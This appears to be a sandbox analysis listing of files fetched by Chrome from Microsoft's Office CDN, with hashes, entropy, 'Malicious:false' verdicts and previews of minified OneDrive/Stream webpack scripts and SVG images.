                                                  Preview:<svg width="220" height="222" viewBox="0 0 220 222" fill="none" xmlns="http://www.w3.org/2000/svg">..<path opacity="0.2" d="M184.395 186.005C229.419 157.416 217.516 110.412 197.766 70.3088C191.115 56.8041 192.668 31.8932 180.134 22.2853C155.094 3.08652 137.077 8.57249 122.146 26.4808C115.515 34.4355 102.273 41.9194 86.9565 36.7996C71.64 31.6797 22.873 31.6989 51.7818 90.6228C72.0567 131.944 41.4524 130.02 19.72 145.87C-1.62315 161.434 24.5621 193.375 50.3931 202.514C81.6088 213.56 155.576 204.305 184.395 186.005Z" fill="#797673"/>..<path d="M112.036 47.0791L7.40295 66.9566C7.0264 67.0283 6.68062 67.2146 6.41216 67.4905C6.14371 67.7664 5.96545 68.1187 5.90139 68.4999C5.83733 68.8811 5.89054 69.273 6.05386 69.6228C6.21718 69.9726 6.48276 70.2635 6.81487 70.4563L20.6029 78.4612L112.036 47.0791Z" fill="#EDD3B0"/>..<path d="M31.3711 105.97L46.4711 94.945L34.3304 87.4902L31.3711 105.97Z" fill="url(#paint0_linear_1003_115095)"/>..<path d="M34.3242 87.4946L46.4655 94.9487L61.2234 104.009C61.99
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (8214)
                                                  Category:downloaded
                                                  Size (bytes):10450
                                                  Entropy (8bit):5.4887275631703805
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BBDCEB51370B06A21CA57DA35DC04EBE
                                                  SHA1:6CFB353D4E46F296AEB88EDEFD0082515D4ED784
                                                  SHA-256:F0F06A9A71DAD2952E2ADC9D27FAD4B9E52F2482C84B283DCB23DE859CFBF479
                                                  SHA-512:E7FD3C7DE147130268FF25FF06CC585052FCC0B993527E31F67E5A37C45D752A9F34E3AC48F0B53A3367E0B0F76E487764791C91B839D211C5D1972F36DCD559
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/127.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[127],{2766:function(e,t,n){n.d(t,{a:function(){return h},b:function(){return _},c:function(){return m},d:function(){return b}});var a=n("odsp.util_460"),i=n(373),r={ODB:61554},o={ODB:62043};function s(){return a.Tb.isFeatureEnabled(o)}var c=!1;function d(e){var t,n=l("Error"),a=(0,i.a)();a.availability.customCopilotEAPCheckErrorType=e,null===(t=window.localStorage)||void 0===t||t.setItem(n,a.availability.customCopilotEAPCheckErrorType)}function l(e){return"UserInEAPGroup_".concat(e)}var u={ODB:61866},f={ODB:61991},p={ODB:62020};function m(e){if(a.Tb.isFeatureEnabled(r))return!0;if(s()){var t=(0,i.a)();t.availability.customCopilotEAPCheckEnabled=!0;var o=e.pageContextForEAPCheck;if(!o||!o.aadUserId)return d(o?"MissingAADUserId":"MissingPageContext"),!1;t.availability.aadUserId=o.aadUserId;var u=(f=o.aadUserId,"true"===(null===(p=window.localStorage)||void 0===p?void 0:p.getItem(l(f))));return t.availability.is
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7986)
                                                  Category:dropped
                                                  Size (bytes):144111
                                                  Entropy (8bit):5.310216090644081
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C43FBFCC05AE5A4F577E29275C8E5A88
                                                  SHA1:463797FACA1F90D7110FF8CBC67F3F9FCB9E2EEA
                                                  SHA-256:D8CBCA7D0F90DE8CF25D0AFE3C6BDB7B90869E6FD8CC24ACEE71CFE082602EB8
                                                  SHA-512:1690F1A2500F6247EDAC3F0F0540E60643D197B22D1AD00927707F8AA6798A1BABBCFE60A5F2BADD936F403B5666328DFC834163C867D230A3A0DDC67E74BED4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[333,425,285,1692,1649,1222,1044],{2585:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.Html5file=0]="Html5file",e[e.Folder=1]="Folder"}(a||(a={})),t.b=a}.,3192:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n(0).a)("bundle")}.,3047:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n(0).a)("shared")}.,3190:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return c},c:function(){return i},d:function(){return s},e:function(){return o}});var a=n(0),i=new a.a("listMediaTransform"),r=new a.a("itemMediaTransform"),o=new a.a("mediaTransformThumbnailUrlGenerator"),s=new a.a("mediaTransformPdfUrlGenerator"),c=new a.a("itemOriginalContentThumbnailUrl")}.,3544:function(e,t,n){n.d(t,{a:function(){return o},b:function(){return s}});var a=n(278),i=n(22),r=n(536),o=new(n(44).a)("childItemKeys",function(e,t){var n=t.itemKey,r=e.demandItemFacet(a.a,n),o=e.demandItemFacet(i.a,n)
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65301)
                                                  Category:downloaded
                                                  Size (bytes):131731
                                                  Entropy (8bit):5.212173823574124
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:17A8216F1284B329BB4355653EC4A7BB
                                                  SHA1:557EBEAF9EC6DB1B290D14715B9A1A8931DE5426
                                                  SHA-256:39FA91D25DF69A16E96EBB473560BAAEE945FE0700F6A466C82FD0A728B31C22
                                                  SHA-512:438A9D66AEBA3BD76858BE4C77AF661AB9B1E6CFF811E55F151B6145ED5887AA09271A517721A72283277BB896A5A1A057D59F11FE27090E639224BD34887442
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/89453.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[89453],{751265:(e,t,n)=>{var a;n.d(t,{P:()=>a}),function(e){e.Horizontal="Horizontal",e.Vertical="Vertical",e.Longer="Longer"}(a||(a={}))}.,989453:(e,t,n)=>{n.d(t,{C:()=>ae});var a=n(295610),i=n(751265),r=n(243727),o=n(82999),s=n(607539),c=n(531344),d=n(551638),l=n(460177),u=n(857471),f=n(287615),p=n(124825),m=new Map([["UNSUPPORTED_SCHEME",!1],["TIMEOUT",!1],["HTTP_ERROR",!1],["MALFORMED_DATA_URI",!1],["INVALID_TEXT_HEADER",!1],["INVALID_TEXT_CUE ",!1],["UNABLE_TO_DETECT_ENCODING",!1],["BAD_ENCODING",!1],["TEXT_COULD_NOT_GUESS_MIME_TYPE",!0],["MISSING_TEXT_PLUGIN",!0],["BUFFER_READ_OUT_OF_BOUNDS",!1],["JS_INTEGER_OVERFLOW",!1],["EBML_OVERFLOW",!1],["EBML_BAD_FLOATING_POINT_SIZE",!1],["MP4_SIDX_WRONG_BOX_TYPE",!1],["MP4_SIDX_INVALID_TIMESCALE",!1],["MP4_SIDX_TYPE_NOT_SUPPORTED",!1],["WEBM_CUES_ELEMENT_MISSING",!1],["WEBM_EBML_HEADER_ELEMENT_MISSING",!1],["WEBM_SEGMENT_ELEMENT_MISSING",!1],["
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4605)
                                                  Category:downloaded
                                                  Size (bytes):14256
                                                  Entropy (8bit):5.474567519853293
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F8E6AD2C3265A1194BDF7A924A409F99
                                                  SHA1:0AC90E2BBAB847DFF61755A9F08F3BD304A8691A
                                                  SHA-256:4D8B2F1EC4D413F8BC62A4EEE7AE7EB68A02E7D83039718FE53D5FECA271F12F
                                                  SHA-512:6040875E7C54B78E98EB2A29F6F574384BFC00FA277E0A3CB4FA265A86DD1C521A214D38717D7F3DAAA0AFFA870477EF2B5B9136F3383CCCE86B112CBF06C8F1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/51542.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[51542],{366605:(e,t,n)=>{n.d(t,{R:()=>f});var a=n(408156),i=n(142866),r=n(653350),o=n(369545),s=n(671433);const c=(0,o.s)({root:{jrapky:0,Frg6f3:0,t21cq0:0,B6of3ja:0,B74szlk:"f8dz51a",a9b677:"f14z66ap",B9xav0g:0,oivjwe:0,Bn0qgzm:0,Bgfg5da:"f1facbz3"}},{d:[[".f8dz51a{margin:4px -5px 4px -5px;}",{p:-1}],".f14z66ap{width:auto;}",[".f1facbz3{border-bottom:var(--strokeWidthThin) solid var(--colorNeutralStroke2);}",{p:-1}]]});var d=n(755289),l=n(989714),u=n(527872);const f=a.forwardRef((e,t)=>{const n=((e,t)=>({components:{root:"div"},root:i.wx((0,r.h)("div",{role:"presentation","aria-hidden":!0,...e,ref:t}),{elementType:"div"})}))(e,t);return(e=>{const t=c();e.root.className=(0,s.z)("fui-MenuDivider",t.root,e.root.className)})(n),(0,u.mj)("useMenuDividerStyles_unstable")(n),(e=>((0,l.a)(e),(0,d.vZ)(e.root,{})))(n)});f.displayName="MenuDivider"}.,961050:(e,t,n)=>{n.d(t,{k:()=>f});var a=n(408156),i
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (42754)
                                                  Category:dropped
                                                  Size (bytes):42785
                                                  Entropy (8bit):5.2584724077065434
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:55C73223009BCBCE20C0E7C97286B69E
                                                  SHA1:E26B1DD7E1D762023BC681D19D14A204C8EEF98B
                                                  SHA-256:9CC94E74E77FD0409CBFD8A0AC257819D16E7833B44334285193D79817A2D729
                                                  SHA-512:6D7E53F453BCC90CF1BE359E5D7ED422541E25ADCA7B206E83D8E19AC081719B9D40BBFCFC0DF5FD71F2A2775423303FA34703852138549CC572A4AE54EFA6B4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.util"],{"odsp.util_460":function(e,t,n){function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.d(t,{S7:function(){return gt},vh:function(){return vt},UV:function(){return Ke},EI:function(){return Ke},Bj:function(){return zt},k0:function(){return Je},us:function(){return $e},Z3:function(){return Ze},t_:function(){return yt},Kh:function(){return Ve},JW:function(){return Y},bJ:function(){return _},c2:function(){return Q},rx:function(){return m},m2:function(){return Ct},g8:function(){return q},Yv:function(){return p},et:function(){return r},_Q:function(){return Kt},z8:function(){return Pt},K9:function(){return T},HW:function(){return T},Q6:function(){return at},bL:function(){return un},bx:function(){return St},fP:function(){return Dt},k:function(){return xt},cX:function(){retu
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4186)
                                                  Category:downloaded
                                                  Size (bytes):4191
                                                  Entropy (8bit):5.207198698883209
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D2E6483A7D3569A2524F6035AF91D7D8
                                                  SHA1:150910350337816077D9E1D0FD785CCE7C5DA65C
                                                  SHA-256:3794C3B0D0CEA980B0069543EADE59368207DB52B98AAB88F8C777AB283E4D90
                                                  SHA-512:654353B043C71FFD4E030596AA46442BA3216ADD641F642449B01206C4BD257898076B0ECF387B23757C370318C3BD4A649F17B2112634083283181A044A34D1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/streamWebApp.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[91752],{447899:(e,t,n)=>{n.r(t),n.d(t,{createStreamWebApp:()=>_,loadMtcManager:()=>f.s,onePlayerVersion:()=>l._,prefetchManifest:()=>p.g,prefetchManifestLite:()=>p.H,prewarmResources:()=>u.G,stringToMediaVisibility:()=>m.r});var a=n(295610),i=n(82999),r=n(782849),o=n(73413),s=function(e){function t(t,n){var a=e.call(this,t)||this;return a.getStreamWebAppPlugins=n,a.isRemoveHelpPluginFromSWAEnabled=!!a.featureConfiguration.settings.getSetting("isRemoveHelpPluginFromSWAEnabled","boolean"),a.onResize=function(){var e;a.navigationButtonStyle.value=c(!!(null===(e=a.options.hostPluginUiOptions)||void 0===e?void 0:e.isSidePanelEnabled)),a.updateNavigationContainerStyle()},a.updateNavigationContainerStyle=function(){a.navigationContainerDiv&&(a.navigationContainerDiv.className=a.ui.navigationPanelShown.value?a.navigationContainerDiv.className="swa-navigation-container-open":a.navigationContainerDiv.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (43609)
                                                  Category:downloaded
                                                  Size (bytes):57962
                                                  Entropy (8bit):5.4967224753012065
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B9B856C82390579ACE22E1698143FF52
                                                  SHA1:49AF8AFDB1446CE2E6B1F02522065DBB948D86BB
                                                  SHA-256:D51D08255A4D19AA8A586ED56522DEA4789E36A78A65551CBFDB5D51D124D645
                                                  SHA-512:8AA342E249D8DB09F612B6769946EF705D07DBE68F091A6A9026F8C5D71832600948CBCFB4EAA27AE578D446EE93E7E7FCA5EFEB1C9919C8F189BBBFEB6272A8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/15.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[15],{5760:function(e,t,n){function a(e){return".pbix"===e}n.d(t,{a:function(){return a}})}.,7812:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e.None="None",e.FilterInViewDef="FilterInViewDef",e.MultiSortsInViewDef="MultiSortsInViewDef",e.SortFieldInViewDef="SortFieldInViewDef",e.FilterInQueryParam="FilterInQueryParam",e.SortFieldInQueryParam="SortFieldInQueryParam",e.GroupFieldInQueryParam="GroupFieldInQueryParam",e.NoPermission="NoPermission",e.Unknown="Unknown"}(a||(a={}))}.,5754:function(e,t,n){n.r(t),n.d(t,{getServerData:function(){return S},getServerDataWithPrefetch:function(){return y}});var a=n("tslib_102"),i=n(184),r=n(1494),o=n(1565),s=n(30),c=n(134),d=n(6),l=n(28),u=n(1563),f=n(80),p=n(1495),m=n(5755),_=n(100);function h(e,t){var n=e.HttpRoot||new _.default(t).authority,i=new _.default(n).path,r=(e.listUrlDir||"").slice(0,i.length)===i;return(0,a.W_)((0,a.W_)({},e),{listUrlDir:r
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:dropped
                                                  Size (bytes):862
                                                  Entropy (8bit):4.837729584195234
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5EEE17FAACA889C47687AD39E4585273
                                                  SHA1:AE89E10486B8EC2CA38BE29ACBCF90117E0747AD
                                                  SHA-256:E12F4F21EDA26E30E5C4C9A92FA179B7CD16A2C2A68F2FAD64A686A64740FDD8
                                                  SHA-512:4DEF977D1E1B9D77A83BD38B6DAB27CC5A90D83E245B5B884574C2CA60B8BF6DCDA9A69F3F69A70C93EBF3B9ED0B92FF8D29A93ACF232151CCF869ADE13ABEA2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="12" height="12" rx="2.5" fill="white"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M3.5 3C3.22386 3 3 3.22386 3 3.5C3 3.77614 3.22386 4 3.5 4H7.29289L3.14645 8.14645C2.95118 8.34171 2.95118 8.65829 3.14645 8.85355C3.34171 9.04882 3.65829 9.04882 3.85355 8.85355L8 4.70711V8.5C8 8.77614 8.22386 9 8.5 9C8.77614 9 9 8.77614 9 8.5V3.5C9 3.22386 8.77614 3 8.5 3H3.5Z" fill="#0F6CBD"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M9.5 1H2.5C1.67157 1 1 1.67157 1 2.5V9.5C1 10.3284 1.67157 11 2.5 11H9.5C10.3284 11 11 10.3284 11 9.5V2.5C11 1.67157 10.3284 1 9.5 1ZM2.5 0C1.11929 0 0 1.11929 0 2.5V9.5C0 10.8807 1.11929 12 2.5 12H9.5C10.8807 12 12 10.8807 12 9.5V2.5C12 1.11929 10.8807 0 9.5 0H2.5Z" fill="#605E5C" fill-opacity="0.64"/>..</svg>..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (17002)
                                                  Category:downloaded
                                                  Size (bytes):80010
                                                  Entropy (8bit):5.401177184570899
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6FCFC960B118594E6B23AACD56510BEC
                                                  SHA1:8F85E9EF095B82870BE1C23F41768437D32A19F0
                                                  SHA-256:48A88B0880D62D09CD61D100050EEFF259A3177D41E863A952E0F21D5EBCB3C6
                                                  SHA-512:3C8C98769EBA3F747B8767722F25506D895D44D80572FAAE5BB546387394EBC2AA42E8A50EBF6BFB150797BE949DB7A38091A5DC7D2DFD2EDE92CF85D01C03CE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/36.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[36,1079],{3267:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.publish=0]="publish",e[e.schedule=1]="schedule",e[e.unpublish=2]="unpublish"}(a||(a={}))}.,5773:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n(21),r=n(67),o=n(72),s=n(276),c=n(4643),d=(0,i.b)(function(){return function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){return e((0,r.b)(s.b,o.a)(c.b)),e((0,r.b)(s.a,o.a)(c.b)),[2]})})}})}.,5768:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n(48),r=n(21),o=n(332),s=n(216);function c(e,t){var n=t.currentItemKey,a=e.demandItemFacet(s.a,n);return a?{currentItemKey:a.remoteItemKey}:{}}var d=(0,r.b)(function(){return function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){return e((0,i.b)(s.a,o.a)(c)),[2]})})}})}.,4643:function(e,t,n){n.d(t,{a:function(){return D},b:fu
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):87589
                                                  Entropy (8bit):5.353441609001081
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0199BDC4C67E70AD76C40BF8AF0520A2
                                                  SHA1:AD924CC03F68E8F31EDDBCDB47145F477CAC5D2F
                                                  SHA-256:53E7B41206648D5205845163042D16EAC1A94F322F48FA4410DAE76A70AB0DE5
                                                  SHA-512:5E01D2B4D7730ED0EE9CCDC27A808FBD5CC7F4F4C6F6B61EBEF705CE66DC503D4E57A9E17F7B48C97D68E1F67BCB266B57B2D1675B2D31A43712567A6EBF5F29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.components.migration/fui.lcom-dfa1f37a.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lcom"],{"fui.lcom_138":(e,t,n)=>{n.d(t,{n_:()=>i,xN:()=>f,CQ:()=>A,Dx:()=>b,GC:()=>x,Ce:()=>M,k3:()=>fe,P6:()=>m,PQ:()=>pe,L0:()=>u,TF:()=>Ie,tM:()=>he,UY:()=>ve,Kj:()=>Oe,A8:()=>a,Kp:()=>ct,kL:()=>G,FA:()=>Ye,_Q:()=>U,pU:()=>H,Tg:()=>j,jo:()=>Ae,Bw:()=>Me,ir:()=>Be,Ys:()=>Fe,a_:()=>Ge,Ur:()=>Y,Uy:()=>R,XY:()=>J,d5:()=>qe,Rj:()=>Qe,Xp:()=>et,Gk:()=>at,ts:()=>ht,h9:()=>gt,u9:()=>yt,Iw:()=>vt,UN:()=>St,XU:()=>Mt,qn:()=>Tt,sZ:()=>Ht,lT:()=>te,HR:()=>re,_j:()=>ce,Eh:()=>ae,Is:()=>ot,U0:()=>Dt,Br:()=>rt,De:()=>lt,aq:()=>le,jw:()=>it,SF:()=>V,ZL:()=>z,Xi:()=>I,su:()=>k,ci:()=>B,zn:()=>de,tG:()=>ne,GG:()=>se,d8:()=>ge,i2:()=>Ce,B5:()=>ke,OE:()=>l,Fo:()=>ze,HL:()=>Ke,dX:()=>nt,v5:()=>ut,fc:()=>p,Xo:()=>Ft,nW:()=>X,R8:()=>$,Fh:()=>Z,Ru:()=>Ct,x:()=>xt,FO:()=>Te,gM:()=>st,lN:()=>Et,V3:()=>Ue,x5:()=>Pe,Bp:()=>$e,L8:()=>wt,By:()=>Lt,a$:()=>kt});var a,i,r=n("tslib_102"),o=n("react-lib"),s=n("fui.util_369");!function(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):9169
                                                  Entropy (8bit):4.6128705635340514
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:89112ABE1A5423807D457AFE3038D701
                                                  SHA1:D24193119F11CDAD350C499CC7C5E0E0085BC23D
                                                  SHA-256:506EB320DF82306C54128A553C8D36A98F36A0CD9B94E5A0796FBAE8BA27A97F
                                                  SHA-512:3E579C23D84D651A0DD60B76045B0FCCE9A41870A39777B72D1925A8A4ECC798EB634FB8163FAE89F956C28162C0FE7B2B366140D8FA958C22938DA263E57523
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_sharedbyme.svg
                                                  Preview:<svg id="GRAPHICS" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="208" height="208" viewBox="0 0 208 208"><defs><linearGradient id="linear-gradient" x1="106.703" y1="71.321" x2="20.261" y2="71.321" gradientUnits="userSpaceOnUse"><stop offset="0.002" stop-color="#f5b453"/><stop offset="0.581" stop-color="#fed494"/></linearGradient><linearGradient id="linear-gradient-2" x1="134.889" y1="205.529" x2="134.889" y2="141.158" gradientUnits="userSpaceOnUse"><stop offset="0.002" stop-color="#f5b453"/><stop offset="0.295" stop-color="#fed494"/></linearGradient><radialGradient id="radial-gradient" cx="844.326" cy="87.001" r="27.518" gradientTransform="matrix(0.998, 0.068, -0.069, 1.006, -706.536, 25.154)" gradientUnits="userSpaceOnUse"><stop offset="0.338" stop-color="#797673"/><stop offset="0.513" stop-color="#979592"/><stop offset="0.701" stop-color="#b1afac"/><stop offset="0.869" stop-color="#c1bebc"/><stop offset="1" stop-color="#c6c4c2"/></radialGradient
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (27907)
                                                  Category:downloaded
                                                  Size (bytes):39348
                                                  Entropy (8bit):4.992021853029257
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:458E5B29AFB1D6E0F18AA1115EC3300E
                                                  SHA1:0819150CC3342C8E7DC9952A1E7DB6075025557E
                                                  SHA-256:6934935A29298C9CF60AEF62513D16E38D1403E440A60B9D85EF451788326D04
                                                  SHA-512:B8CF21940D7D84827D1C4E137CB4FDDF2BAEF9F15AB7EBF6A695144D2ACFC4F1A9B97A093331085D300280BB60831E46B5E0E044249C7945C23BC5F8309B5623
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/31544.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[31544],{974023:(e,t,n)=>{n.d(t,{_:()=>f});var a=n(408156),i=n(142866),r=n(653350),o=n(755289),s=n(989714),c=n(369545),d=n(671433);const l=(0,c.s)({root:{Bahqtrf:"fk6fouc",sj55zd:"f19n0e5"},disabled:{sj55zd:"f1s2aq7o",Bbusuzp:"f1dcs8yz"},required:{sj55zd:"f1whyuy6",uwmqm3:["fruq291","f7x41pl"]},small:{Be2twd7:"fy9rknc",Bg96gwp:"fwrc4pm"},medium:{Be2twd7:"fkhj508",Bg96gwp:"f1i3iumi"},large:{Be2twd7:"fod5ikn",Bg96gwp:"faaz57k",Bhrd7zp:"fl43uef"},semibold:{Bhrd7zp:"fl43uef"}},{d:[".fk6fouc{font-family:var(--fontFamilyBase);}",".f19n0e5{color:var(--colorNeutralForeground1);}",".f1s2aq7o{color:var(--colorNeutralForegroundDisabled);}",".f1whyuy6{color:var(--colorPaletteRedForeground3);}",".fruq291{padding-left:var(--spacingHorizontalXS);}",".f7x41pl{padding-right:var(--spacingHorizontalXS);}",".fy9rknc{font-size:var(--fontSizeBase200);}",".fwrc4pm{line-height:var(--lineHeightBase200);}",".fkhj508{f
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1401)
                                                  Category:dropped
                                                  Size (bytes):1406
                                                  Entropy (8bit):4.6931278299669765
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:38F0C005EAEA8255D045E79E797D08C7
                                                  SHA1:DBBDAC7D8A889060FF5FB7E915C4A849AB4036E0
                                                  SHA-256:A96BCD9EB12EE28E1A8CA4025A7520B26C4BF6AE53406F367B1189ECEB5BD8D7
                                                  SHA-512:74F3AA56963D4065590B85E80CFFB447ABB2B35AF3E9C878A44FBF41CD6B8E29D3B580F3087625EFF62FFB6DEEB54F7FD4680F547C0BE01F2041DA7B1F11546D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[21],{8160:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r},c:function(){return o},d:function(){return s}});var a=n(2490);const i=(0,a.a)("PersonRegular","1em",["M10 2a4 4 0 1 0 0 8 4 4 0 0 0 0-8ZM7 6a3 3 0 1 1 6 0 3 3 0 0 1-6 0Zm-2 5a2 2 0 0 0-2 2c0 1.7.83 2.97 2.13 3.8A9.14 9.14 0 0 0 10 18c1.85 0 3.58-.39 4.87-1.2A4.35 4.35 0 0 0 17 13a2 2 0 0 0-2-2H5Zm-1 2a1 1 0 0 1 1-1h10a1 1 0 0 1 1 1c0 1.3-.62 2.28-1.67 2.95A8.16 8.16 0 0 1 10 17a8.16 8.16 0 0 1-4.33-1.05A3.36 3.36 0 0 1 4 13Z"]),r=(0,a.a)("SearchRegular","1em",["M8.5 3a5.5 5.5 0 0 1 4.23 9.02l4.12 4.13a.5.5 0 0 1-.63.76l-.07-.06-4.13-4.12A5.5 5.5 0 1 1 8.5 3Zm0 1a4.5 4.5 0 1 0 0 9 4.5 4.5 0 0 0 0-9Z"]),o=(0,a.a)("StarFilled","1em",["M9.1 2.9a1 1 0 0 1 1.8 0l1.93 3.91 4.31.63a1 1 0 0 1 .56 1.7l-3.12 3.05.73 4.3a1 1 0 0 1-1.45 1.05L10 15.51l-3.86 2.03a1 1 0 0 1-1.45-1.05l.74-4.3L2.3 9.14a1 1 0 0 1 .56-1.7l4.31-.63L9.1 2.9Z"]),s=(0,a.a
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (62741)
                                                  Category:downloaded
                                                  Size (bytes):309330
                                                  Entropy (8bit):5.246296979979902
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F2CE496ACB7976479A818D29CCB97209
                                                  SHA1:62CD120EDFB1987D487375B695C86A39523C5886
                                                  SHA-256:25009C9DB9AA974FE32BDB045C83F45FCD53DC228DEE3FBF15CD2787E4F94F99
                                                  SHA-512:020A46CA153874296DCF8737015C2A53C6E4D7BFD41941DFD6F6BBDAF5ECD29D781FFF6AFAC6FE0DC51EA2C082D17888C1BFD84D4D8FD602F5824A21A3D2D376
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/58148.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[58148],{32689:(e,t,n)=>{n.d(t,{$l:()=>s,Ho:()=>d,K8:()=>o,VJ:()=>c,hr:()=>r,kb:()=>l});var a,i=n(147714),r=[".3g2",".3gp",".3gpp",".asf",".avi",".m4v",".mkv",".mov",".mp4",".mp4v",".mts",".ts",".webm",".wmv",".m4a",".mp3",".wav",".wma",".m2ts"];function o(e){return null!=e&&""!==e&&e.toLowerCase()!==i.Y}function s(e){return void 0!==e&&["Business","Consumer"].includes(e.accountType)}function c(e){var t,n,a;return"meeting"===(null===(n=null===(t=e.telemetryContext.mediaContext)||void 0===t?void 0:t.contentType)||void 0===n?void 0:n.toLowerCase())&&"teams"===(null===(a=e.contentSourceApplication.value)||void 0===a?void 0:a.toLowerCase())}function d(e){return"EditTrustedHost"===e||"NoEditTrustedHost"===e}function l(e,t,n){return void 0===t&&(t=200),void 0===n&&(n=""),new Promise(function(a,i){var r=setTimeout(function(){return i(new Error("Promise timed out after '".concat(t," ms'.")+(""!==n?"
